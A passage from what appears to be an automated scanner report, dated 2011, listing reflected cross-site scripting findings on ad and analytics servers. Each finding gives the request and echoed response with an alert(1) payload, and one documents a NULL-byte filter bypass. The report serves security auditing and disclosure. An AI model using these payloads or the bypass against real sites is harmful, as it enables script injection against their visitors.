User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uuid=OPTOUT
|
Response
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: uuid=657572620850510527; Version=1; Domain=.agkn.com; Max-Age=157680000; Expires=Sun, 04-Sep-2016 12:45:06 GMT; Path=/
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: u=6|0BEIV%2BNJSAAAAABIBArwBATUBC%2FEB8AADAUIBB4ABQwEHgAFBAQeAAQK8fnhU7Shw8lB7AAAAAAAAAyUAAAAAAAAL8QAAAAAAAAE1AmEAAA%3D%3D; Version=1; Domain=.agkn.com; Max-Age=63072000; Expires=Thu, 05-Sep-2013 12:45:06 GMT; Path=/
Cache-Control: max-age=0, must-revalidate
Pragma: no-cache
Expires: Thu, 1 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 12:45:05 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta ht
...[SNIP]...
<a href="http://pixel.mathtag.com/click/img?mt_aid=344272482798721733&mt_id=126413&mt_adid=101060&redirect=a5798"><script>alert(1)</script>bbf67718b2ehttp://ad.agkn.com/interaction!che=989082879?imid=8670815940544450683&ipid=805&caid=700&cgid=309&crid=3057&a=CLICK&adid=609&status=0&l=http://www.motorola.com/Consumers/US-EN/Consumer-Product-and-Servi
...[SNIP]...
|
2.13. http://ads.media.net/medianet.php [size parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://ads.media.net |
| Path: |
/medianet.php |
Issue detail
The value of the size request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 71f42'%3balert(1)//acefc548551 was submitted in the size parameter. This input was echoed as 71f42';alert(1)//acefc548551 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /medianet.php?cid=7CU2PK0I5&size=300x25071f42'%3balert(1)//acefc548551&crid=712228940&ran=0.19952531741000712 HTTP/1.1
Host: ads.media.net
Proxy-Connection: keep-alive
Referer: http://shopping.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
|
Response
HTTP/1.0 200 OK
Date: Tue, 06 Sep 2011 12:45:26 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Content-Length: 6882
Connection: close
Content-Type: text/html; charset=UTF-8
<html><head></head><body style="margin: 0px; padding: 0px;">
<script language="javascript" type="text/javascript">
(function(){ var staticFrameUrl = 'http://srv.cdn-media.net/'; var requrl = '', fd = '', servingURL = 'http://search.keywordblocks.com/cmdynet?', kurl = '', cid = '7CU2PK0I5', size = '300x25071f42';alert(1)//acefc548551', crid = '712228940', widthx = '300', heighty = '25071f42';alert(1)//acefc548551';window._mN={};_mN._util={isAdProviderUrl:function(a){if(a==undefined||a==""){return false}return(_mN._sjc.providers.te
...[SNIP]...
|
2.14. http://ads.pointroll.com/PortalServe/ [r parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://ads.pointroll.com |
| Path: |
/PortalServe/ |
Issue detail
The value of the r request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a17b3"%3balert(1)//1d7d4442f53 was submitted in the r parameter. This input was echoed as a17b3";alert(1)//1d7d4442f53 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /PortalServe/?pid=1394840Y52120110823224152&time=2|12:45|-5&redir=http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0bW92NGptYihnaWQkYXkzOTlFU08yMlRwQVJwalRsLndqUXFiTWhkN2FrNW1GZEFBQW14USxzdCQxMzE1MzEzMTA0MTkzNTAxLHNpJDQ0NjMwNTEsdiQxLjAsYWlkJHRrcFc4VUplNXFBLSxjdCQyNSx5YngkUC5PSDNVZ1FtaGRTUV9HV1dQbFd3QSxyJDAscmQkMTZpNmRwbDFzKSk/1/*http://global.ard.yahoo.com/SIG=15kacfpj6/M=999999.999999.999999.999999/D=music/S=791000026:LREC/Y=YAHOO/EXP=1315320304/L=ay399ESO22TpARpjTl.wjQqbMhd7ak5mFdAAAmxQ/B=tkpW8UJe5qA-/J=1315313104251332/K=k1l.VZAYPvQ2T2sK4DlGjQ/A=3685707077155226847/R=0/X=6/*$CTURL$&r=0.34970951941795647a17b3"%3balert(1)//1d7d4442f53 HTTP/1.1
Host: ads.pointroll.com
Proxy-Connection: keep-alive
Referer: http://new.music.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PRID=FC84F463-F810-4805-B5C6-DA875B835084; PRbu=ErB40RtCA; PRvt=CBJ9xErENUwPwYAcUBBe; PRgo=BBBAAsJvBBVBF4FR; PRimp=43AC0400-C054-18FC-0309-F71007140101; PRca=|AKfq*9:2|AKcV*1774:3|#; PRcp=|AKfqAAQ0:1|AKfqAAAJ:1|AKcVAA2c:3|#; PRpl=|Fqqc:1|Fqqq:1|Fhqf:3|#; PRcr=|GV12:2|GSur:3|#; PRpc=|FqqcGV12:1|FqqqGV12:1|FhqfGSur:3|#
|
Response
HTTP/1.1 200 OK
Connection: close
Date: Tue, 06 Sep 2011 12:45:19 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
Cache-Control: no-cache
document.write("<iframe id='profr1394840' src='http://ads.pointroll.com/PortalServe/?pid=1394840Y52120110823224152&cid=1512429&pos=h&redir=http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0
...[SNIP]...
Y=YAHOO/EXP=1315320304/L=ay399ESO22TpARpjTl.wjQqbMhd7ak5mFdAAAmxQ/B=tkpW8UJe5qA-/J=1315313104251332/K=k1l.VZAYPvQ2T2sK4DlGjQ/A=3685707077155226847/R=0/X=6/*$CTURL$&time=2|12:45|-5&r=0.34970951941795647a17b3";alert(1)//1d7d4442f53&server=polRedir' width='300' height='250' frameborder='0' marginwidth='0' marginheight='0' scrolling='NO'>
...[SNIP]...
|
2.15. http://ads.pointroll.com/PortalServe/ [redir parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://ads.pointroll.com |
| Path: |
/PortalServe/ |
Issue detail
The value of the redir request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bd5d9"-alert(1)-"b85f3aab297 was submitted in the redir parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /PortalServe/?pid=1394840Y52120110823224152&time=2|12:45|-5&redir=http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0bW92NGptYihnaWQkYXkzOTlFU08yMlRwQVJwalRsLndqUXFiTWhkN2FrNW1GZEFBQW14USxzdCQxMzE1MzEzMTA0MTkzNTAxLHNpJDQ0NjMwNTEsdiQxLjAsYWlkJHRrcFc4VUplNXFBLSxjdCQyNSx5YngkUC5PSDNVZ1FtaGRTUV9HV1dQbFd3QSxyJDAscmQkMTZpNmRwbDFzKSk/1/*http://global.ard.yahoo.com/SIG=15kacfpj6/M=999999.999999.999999.999999/D=music/S=791000026:LREC/Y=YAHOO/EXP=1315320304/L=ay399ESO22TpARpjTl.wjQqbMhd7ak5mFdAAAmxQ/B=tkpW8UJe5qA-/J=1315313104251332/K=k1l.VZAYPvQ2T2sK4DlGjQ/A=3685707077155226847/R=0/X=6/*$CTURL$bd5d9"-alert(1)-"b85f3aab297&r=0.34970951941795647 HTTP/1.1
Host: ads.pointroll.com
Proxy-Connection: keep-alive
Referer: http://new.music.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PRID=FC84F463-F810-4805-B5C6-DA875B835084; PRbu=ErB40RtCA; PRvt=CBJ9xErENUwPwYAcUBBe; PRgo=BBBAAsJvBBVBF4FR; PRimp=43AC0400-C054-18FC-0309-F71007140101; PRca=|AKfq*9:2|AKcV*1774:3|#; PRcp=|AKfqAAQ0:1|AKfqAAAJ:1|AKcVAA2c:3|#; PRpl=|Fqqc:1|Fqqq:1|Fhqf:3|#; PRcr=|GV12:2|GSur:3|#; PRpc=|FqqcGV12:1|FqqqGV12:1|FhqfGSur:3|#
|
Response
HTTP/1.1 200 OK
Connection: close
Date: Tue, 06 Sep 2011 12:45:18 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
Cache-Control: no-cache
document.write("<iframe id='profr1394840' src='http://ads.pointroll.com/PortalServe/?pid=1394840Y52120110823224152&cid=1512429&pos=h&redir=http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0
...[SNIP]...
99999.999999/D=music/S=791000026:LREC/Y=YAHOO/EXP=1315320304/L=ay399ESO22TpARpjTl.wjQqbMhd7ak5mFdAAAmxQ/B=tkpW8UJe5qA-/J=1315313104251332/K=k1l.VZAYPvQ2T2sK4DlGjQ/A=3685707077155226847/R=0/X=6/*$CTURL$bd5d9"-alert(1)-"b85f3aab297&time=2|12:45|-5&r=0.34970951941795647&server=polRedir' width='300' height='250' frameborder='0' marginwidth='0' marginheight='0' scrolling='NO'>
...[SNIP]...
|
2.16. http://ads.pointroll.com/PortalServe/ [time parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://ads.pointroll.com |
| Path: |
/PortalServe/ |
Issue detail
The value of the time request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9d7cb"%3balert(1)//5a34bad3e0 was submitted in the time parameter. This input was echoed as 9d7cb";alert(1)//5a34bad3e0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /PortalServe/?pid=1394840Y52120110823224152&time=2|12:45|-59d7cb"%3balert(1)//5a34bad3e0&redir=http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0bW92NGptYihnaWQkYXkzOTlFU08yMlRwQVJwalRsLndqUXFiTWhkN2FrNW1GZEFBQW14USxzdCQxMzE1MzEzMTA0MTkzNTAxLHNpJDQ0NjMwNTEsdiQxLjAsYWlkJHRrcFc4VUplNXFBLSxjdCQyNSx5YngkUC5PSDNVZ1FtaGRTUV9HV1dQbFd3QSxyJDAscmQkMTZpNmRwbDFzKSk/1/*http://global.ard.yahoo.com/SIG=15kacfpj6/M=999999.999999.999999.999999/D=music/S=791000026:LREC/Y=YAHOO/EXP=1315320304/L=ay399ESO22TpARpjTl.wjQqbMhd7ak5mFdAAAmxQ/B=tkpW8UJe5qA-/J=1315313104251332/K=k1l.VZAYPvQ2T2sK4DlGjQ/A=3685707077155226847/R=0/X=6/*$CTURL$&r=0.34970951941795647 HTTP/1.1
Host: ads.pointroll.com
Proxy-Connection: keep-alive
Referer: http://new.music.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PRID=FC84F463-F810-4805-B5C6-DA875B835084; PRbu=ErB40RtCA; PRvt=CBJ9xErENUwPwYAcUBBe; PRgo=BBBAAsJvBBVBF4FR; PRimp=43AC0400-C054-18FC-0309-F71007140101; PRca=|AKfq*9:2|AKcV*1774:3|#; PRcp=|AKfqAAQ0:1|AKfqAAAJ:1|AKcVAA2c:3|#; PRpl=|Fqqc:1|Fqqq:1|Fhqf:3|#; PRcr=|GV12:2|GSur:3|#; PRpc=|FqqcGV12:1|FqqqGV12:1|FhqfGSur:3|#
|
Response
HTTP/1.1 200 OK
Connection: close
Date: Tue, 06 Sep 2011 12:45:16 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
Cache-Control: no-cache
document.write("<iframe id='profr1394840' src='http://ads.pointroll.com/PortalServe/?pid=1394840Y52120110823224152&cid=1512429&pos=h&redir=http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0
...[SNIP]...
usic/S=791000026:LREC/Y=YAHOO/EXP=1315320304/L=ay399ESO22TpARpjTl.wjQqbMhd7ak5mFdAAAmxQ/B=tkpW8UJe5qA-/J=1315313104251332/K=k1l.VZAYPvQ2T2sK4DlGjQ/A=3685707077155226847/R=0/X=6/*$CTURL$&time=2|12:45|-59d7cb";alert(1)//5a34bad3e0&r=0.34970951941795647&server=polRedir' width='300' height='250' frameborder='0' marginwidth='0' marginheight='0' scrolling='NO'>
...[SNIP]...
|
2.17. http://adserver.teracent.net/tase/ad [name of an arbitrarily supplied request parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://adserver.teracent.net |
| Path: |
/tase/ad |
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a5c7a"><script>alert(1)</script>8352cc5bcec was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /tase/ad?AdBoxType=49&url=fidelity.yahoo.buttons&inv=yaptenc&adId=t_165052&CustomQuery=lineid%3D207575051%26position%3D1215986051%26site%3Dfinance.yahoo.com&esc=0&rnd=147582&rcu=http://global.ard.yahoo.com/SIG=15ussrhc9/M=601846039.602985816.859733051.826566051/D=fin/S=2142000625:FB2/Y=YAHOO/EXP=1315320486/L=Dzb.VEPDkjnpARpjTl.wjQBoMhd7ak5mFoUADygs/B=odrGPtGDJHI-/J=1315313286070877/K=URqeTfr3zDD1947mBh5eOA/A=3692525337737555437/R=0/X=3/*&a5c7a"><script>alert(1)</script>8352cc5bcec=1 HTTP/1.1
Host: adserver.teracent.net
Proxy-Connection: keep-alive
Referer: http://finance.yahoo.com/lookup?s=xss
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=N9CZDAH.Q7IPoP; imp=a$le#1315313083608_171477072_ap3104_int|374#1315258459362_65704651_as3105_imp|; p161r=b$u-32#5.8GZ|g-yWB#1.8GZ|
|
Response
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Expires: Sat, 6 May 1995 12:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: imp=a$le#1315313290665_68296156_as3105_imp|305#1315313290665_68296156_as3105_imp|374#1315258459362_65704651_as3105_imp|e2366%00%0d%0ae94350cc287#|; Domain=.teracent.net; Expires=Sun, 04-Mar-2012 12:48:10 GMT; Path=/tase
Set-Cookie: p161r=b$u-32#5.8GZ|g-yWB#1.8GZ|7e97a%00%0d%0a7815b11943f#.|; Domain=.teracent.net; Expires=Sun, 04-Mar-2012 12:48:10 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 12:48:10 GMT
Content-Length: 2600
<!DOCTYPE html>
<!-- Impression Id: 1315313290665_68296156_as3105_imp -->
<html lang="en">
<head>
<meta charset="utf-8">
<meta http-equiv="cache-control" content="no-cache"/>
...[SNIP]...
.859733051.826566051/D=fin/S=2142000625:FB2/Y=YAHOO/EXP=1315320486/L=Dzb.VEPDkjnpARpjTl.wjQBoMhd7ak5mFoUADygs/B=odrGPtGDJHI-/J=1315313286070877/K=URqeTfr3zDD1947mBh5eOA/A=3692525337737555437/R=0/X=3/*&a5c7a"><script>alert(1)</script>8352cc5bcec=1http://adserver.teracent.net/tase/redir/1315313290665_68296156_as3105_imp?q=H4sIAAAAAAAAAFWQPW7DMAyFr0LK1F-qnZuNrkHiIxSRE6EeBUdOlSCybtgzVS3aoQsH8nsP77FPnyfvBBIXH2b3up1DiXXlMDkQQAJEZ1Br4jy5PQgEhUQSyNo
...[SNIP]...
|
2.18. http://adserver.teracent.net/tase/ad [rcu parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://adserver.teracent.net |
| Path: |
/tase/ad |
Issue detail
The value of the rcu request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7b4ae"><script>alert(1)</script>c6801dc18e5 was submitted in the rcu parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /tase/ad?AdBoxType=49&url=fidelity.yahoo.buttons&inv=yaptenc&adId=t_165052&CustomQuery=lineid%3D207575051%26position%3D1215986051%26site%3Dfinance.yahoo.com&esc=0&rnd=147582&rcu=http://global.ard.yahoo.com/SIG=15ussrhc9/M=601846039.602985816.859733051.826566051/D=fin/S=2142000625:FB2/Y=YAHOO/EXP=1315320486/L=Dzb.VEPDkjnpARpjTl.wjQBoMhd7ak5mFoUADygs/B=odrGPtGDJHI-/J=1315313286070877/K=URqeTfr3zDD1947mBh5eOA/A=3692525337737555437/R=0/X=3/*7b4ae"><script>alert(1)</script>c6801dc18e5 HTTP/1.1
Host: adserver.teracent.net
Proxy-Connection: keep-alive
Referer: http://finance.yahoo.com/lookup?s=xss
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=N9CZDAH.Q7IPoP; imp=a$le#1315313083608_171477072_ap3104_int|374#1315258459362_65704651_as3105_imp|; p161r=b$u-32#5.8GZ|g-yWB#1.8GZ|
|
Response
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Expires: Sat, 6 May 1995 12:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: imp=a$le#1315313290345_68345684_as3104_imp|305#1315313290345_68345684_as3104_imp|374#1315258459362_65704651_as3105_imp|f5d4d72fe77543f7c2420cd7#|; Domain=.teracent.net; Expires=Sun, 04-Mar-2012 12:48:10 GMT; Path=/tase
Set-Cookie: p161r=b$u-32#5.8GZ|g-yWB#1.8GZ|f5d4d72f11f08cc6d748514#.|; Domain=.teracent.net; Expires=Sun, 04-Mar-2012 12:48:10 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 12:48:09 GMT
Content-Length: 2576
<!DOCTYPE html>
<!-- Impression Id: 1315313290345_68345684_as3104_imp -->
<html lang="en">
<head>
<meta charset="utf-8">
<meta http-equiv="cache-control" content="no-cache"/>
...[SNIP]...
6.859733051.826566051/D=fin/S=2142000625:FB2/Y=YAHOO/EXP=1315320486/L=Dzb.VEPDkjnpARpjTl.wjQBoMhd7ak5mFoUADygs/B=odrGPtGDJHI-/J=1315313286070877/K=URqeTfr3zDD1947mBh5eOA/A=3692525337737555437/R=0/X=3/*7b4ae"><script>alert(1)</script>c6801dc18e5http://adserver.teracent.net/tase/redir/1315313290345_68345684_as3104_imp?q=H4sIAAAAAAAAAFVQu3LDMAz7FVLWM9XQjZt9XXuJP6GtnOjiUefIqZKLrG_rn5XtdemCAQQBkO_56zl6ENBZoZ0yqA3F6YeQAkRnUShJZf1PjMYxGqfGNAlANZZHo
...[SNIP]...
|
2.19. http://beacon.partners-z.com/yre/20100908/b [REST URL parameter 2]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://beacon.partners-z.com |
| Path: |
/yre/20100908/b |
Issue detail
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 93b5d<script>alert(1)</script>db9aaf04338 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /yre/2010090893b5d<script>alert(1)</script>db9aaf04338/b?uuid=3c7f76504307f88c4e126d344670b7cc&prid=dcd1ff2f79f8a83b9c960316c4f85cf1&price=&lid=2124552455,2125516156,89336147,31505014,72516437,72538384,2125075536,79497737,2125160035,2124842339&p=10010&page=search& HTTP/1.1
Host: beacon.partners-z.com
Proxy-Connection: keep-alive
Referer: http://realestate.yahoo.com/search/New_York/New_York/homes-for-sale?typeBak=realestate&p=10010&type=classified&priceLow=&priceHigh=&bedroomLow=&bathroomLow=&search=Search
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
|
Response
HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
X-Cascade: pass
Content-Type: text/plain
Content-Length: 67
Date: Tue, 06 Sep 2011 12:49:57 GMT
Not Found: /yre/2010090893b5d<script>alert(1)</script>db9aaf04338/b |
2.20. http://beacon.partners-z.com/yre/20100908/b [REST URL parameter 3]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://beacon.partners-z.com |
| Path: |
/yre/20100908/b |
Issue detail
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload fb9e5<script>alert(1)</script>37006748ec was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /yre/20100908/bfb9e5<script>alert(1)</script>37006748ec?uuid=3c7f76504307f88c4e126d344670b7cc&prid=dcd1ff2f79f8a83b9c960316c4f85cf1&price=&lid=2124552455,2125516156,89336147,31505014,72516437,72538384,2125075536,79497737,2125160035,2124842339&p=10010&page=search& HTTP/1.1
Host: beacon.partners-z.com
Proxy-Connection: keep-alive
Referer: http://realestate.yahoo.com/search/New_York/New_York/homes-for-sale?typeBak=realestate&p=10010&type=classified&priceLow=&priceHigh=&bedroomLow=&bathroomLow=&search=Search
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
|
Response
HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
X-Cascade: pass
Content-Type: text/plain
Content-Length: 66
Date: Tue, 06 Sep 2011 12:49:59 GMT
Not Found: /yre/20100908/bfb9e5<script>alert(1)</script>37006748ec |
2.21. http://comcast-www.baynote.net/baynote/tags3/guide/results-xsl/comcast-www [elementIds parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://comcast-www.baynote.net |
| Path: |
/baynote/tags3/guide/results-xsl/comcast-www |
Issue detail
The value of the elementIds request parameter is copied into the HTML document as plain text between tags. The payload %00ee062<script>alert(1)</script>6f2ae7bb9cf was submitted in the elementIds parameter. This input was echoed as ee062<script>alert(1)</script>6f2ae7bb9cf in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /baynote/tags3/guide/results-xsl/comcast-www?userId=6923713561343025788&customerId=comcast&code=www&id=1&query=xss&url=http%3A%2F%2Fsitesearch.comcast.com%2F%3Fq%3Dxss%26cat%3Dcom%26con%3Dwww%26sec%3D%26PageName%3DLooking%252Bfor%2BProducts%2Band%2BPrices%253F&appendParams=&rankParam=&condition=d%26g%26s&elementIds=com_search_rightrail_b%00ee062<script>alert(1)</script>6f2ae7bb9cf&v=1 HTTP/1.1
Host: comcast-www.baynote.net
Proxy-Connection: keep-alive
Referer: http://sitesearch.comcast.com/?q=xss&cat=com&con=www&sec=&PageName=Looking%2Bfor+Products+and+Prices%3F
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
|
Response
HTTP/1.1 200 OK
Server: BNServer
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/javascript;charset=ISO-8859-1
Content-Length: 156
Date: Tue, 06 Sep 2011 12:22:28 GMT
bnTagManager.getTag(1).divId = "com_search_rightrail_b.ee062<script>alert(1)</script>6f2ae7bb9cf";
bnResourceManager.registerResource("GLResults1");
|
2.22. http://comcastresidentialservices.tt.omtrdc.net/m2/comcastresidentialservices/mbox/standard [mbox parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://comcastresidentialservices.tt.omtrdc.net |
| Path: |
/m2/comcastresidentialservices/mbox/standard |
Issue detail
The value of the mbox request parameter is copied into the HTML document as plain text between tags. The payload 819af<script>alert(1)</script>f8868cea7a0 was submitted in the mbox parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /m2/comcastresidentialservices/mbox/standard?mboxHost=sitesearch.comcast.com&mboxSession=1315327839174-766376&mboxPage=1315329733349-634146&mboxCount=1&internalkeyword=xss&mbox=Search_Image_Promos819af<script>alert(1)</script>f8868cea7a0&mboxId=0&mboxTime=1315311733394&mboxURL=http%3A%2F%2Fsitesearch.comcast.com%2F%3Fq%3Dxss%26cat%3Dcom%26con%3Dwww%26sec%3D%26PageName%3DLooking%252Bfor%2BProducts%2Band%2BPrices%253F&mboxReferrer=&mboxVersion=38 HTTP/1.1
Host: comcastresidentialservices.tt.omtrdc.net
Proxy-Connection: keep-alive
Referer: http://sitesearch.comcast.com/?q=xss&cat=com&con=www&sec=&PageName=Looking%2Bfor+Products+and+Prices%3F
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_holtihx7Bhabx7Dhx7F=[CS]v4|2730A37085079998-400001008005E291|4E6146E0[CE]
|
Response
HTTP/1.1 200 OK
Content-Type: text/javascript
Content-Length: 215
Date: Tue, 06 Sep 2011 12:22:52 GMT
Server: Test & Target
mboxFactories.get('default').get('Search_Image_Promos819af<script>alert(1)</script>f8868cea7a0',0).setOffer(new mboxOfferDefault()).loaded();mboxFactories.get('default').getPCId().forceId("1315327839174-766376.19"); |
